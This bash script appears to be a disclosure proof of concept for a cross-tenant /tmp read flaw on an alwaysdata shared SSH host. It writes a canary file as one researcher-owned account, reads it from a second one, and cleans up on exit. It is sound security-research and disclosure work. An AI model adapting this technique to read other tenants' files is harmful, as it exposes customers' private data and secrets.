#!/usr/bin/env bash
# F-01 — Cross-tenant /tmp read on alwaysdata SSH host ssh1.
# alwaysdata shares ONE /tmp (mode 1777, NOT polyinstantiated) across all
# accounts on a physical SSH host; platform default umask 022 => new /tmp
# files are world-readable (644). Any SSH customer can read another
# customer's /tmp files on the same host.
#
# Both accounts below are owned by the researcher — zero third-party data
# touched. Fill in SSH creds/keys before running.
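set -euo pipefail

# Account details from the report. Each may be overridden from the environment
# so the same script can be re-run against other researcher-owned accounts
# without editing the file; the defaults are the original constants.
# --- Account A (writer): slug steve-william, uid 530469 -> host ssh1 ---
A_HOST="${A_HOST:-ssh-steve-william.alwaysdata.net}"
A_USER="${A_USER:-steve-william}"

# --- Account B (reader): slug test-domain, uid 530478 (DIFFERENT tenant) -> host ssh1 ---
B_HOST="${B_HOST:-ssh-test-domain.alwaysdata.net}"
B_USER="${B_USER:-test-domain}"

readonly CANARY="/tmp/CANARY_A_secret_9f2b7c1e_ONLY_A_WROTE_THIS.txt"
readonly SECRET="CANARY_A_secret_9f2b7c1e_ONLY_A_WROTE_THIS"

#######################################
# Remove the canary from the shared /tmp as Account A.
# Runs from the EXIT trap so the test artifact does not stay behind in a
# directory every tenant on the host can read, even when Step 2 aborts.
# Globals:  A_USER, A_HOST, CANARY (read)
# Returns:  always 0 (best effort; a failed cleanup must not mask the
#           script's real exit status)
#######################################
cleanup() {
  ssh "${A_USER}@${A_HOST}" "rm -f -- '${CANARY}'" || true
}

#######################################
# Step 1: as Account A, create the canary in the shared /tmp.
# The remote shell runs with `set -C` (noclobber) so the redirection refuses
# to write through a path that already exists in the world-writable directory
# (a leftover from an earlier run, or a file/symlink placed by someone else);
# with `set -e` that refusal aborts the step instead of continuing to chmod.
# The mode is printed once as created (the default-umask result the report
# is about) and once after the explicit chmod that keeps Step 2 deterministic.
# Globals:  A_USER, A_HOST, SECRET, CANARY (read)
# Outputs:  remote diagnostics on stdout
# Returns:  ssh exit status
#######################################
write_canary() {
  echo "=== Step 1: as Account A (${A_USER}) write world-readable canary into shared /tmp ==="
  ssh "${A_USER}@${A_HOST}" "
    set -eC
    echo '[A] umask:'; umask
    echo \"${SECRET} :: written by account steve-william(A) at \$(date -u) uid=\$(id -u)\" > '${CANARY}'
    echo '[A] mode as created (before chmod):'; stat -c '%n owner=%U mode=%a' '${CANARY}'
    chmod 644 '${CANARY}'
    echo '[A] wrote:'; stat -c '%n owner=%U mode=%a' '${CANARY}'
  "
}

#######################################
# Step 2: as Account B (a different tenant/UID on the same host), stat and
# read the file Account A just created.
# Globals:  B_USER, B_HOST, CANARY (read)
# Outputs:  remote diagnostics on stdout
# Returns:  ssh exit status
#######################################
read_canary() {
  echo "=== Step 2: as Account B (${B_USER}, different tenant/UID) read A's file from shared /tmp ==="
  ssh "${B_USER}@${B_HOST}" "
    echo '[B] umask:'; umask
    echo '[B] stat of A-owned file:'; stat -c '%n owner=%U mode=%a' '${CANARY}'
    echo '[B] contents read cross-tenant:'; cat '${CANARY}'
  "
}

#######################################
# Print what a confirming run looks like, for comparison with Step 2 output.
#######################################
print_expected() {
  echo "Expected result: Account B prints Account A's canary line."
  echo "  CANARY_A_secret_9f2b7c1e_ONLY_A_WROTE_THIS :: written by account steve-william(A) ... uid=530469"
  echo "  stat from B shows owner=steve-william mode=644 -> cross-tenant read confirmed."
}

main() {
  # Arm cleanup before anything is written so every exit path removes the file.
  trap cleanup EXIT
  write_canary
  echo
  read_canary
  echo
  print_expected
}

main "$@"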
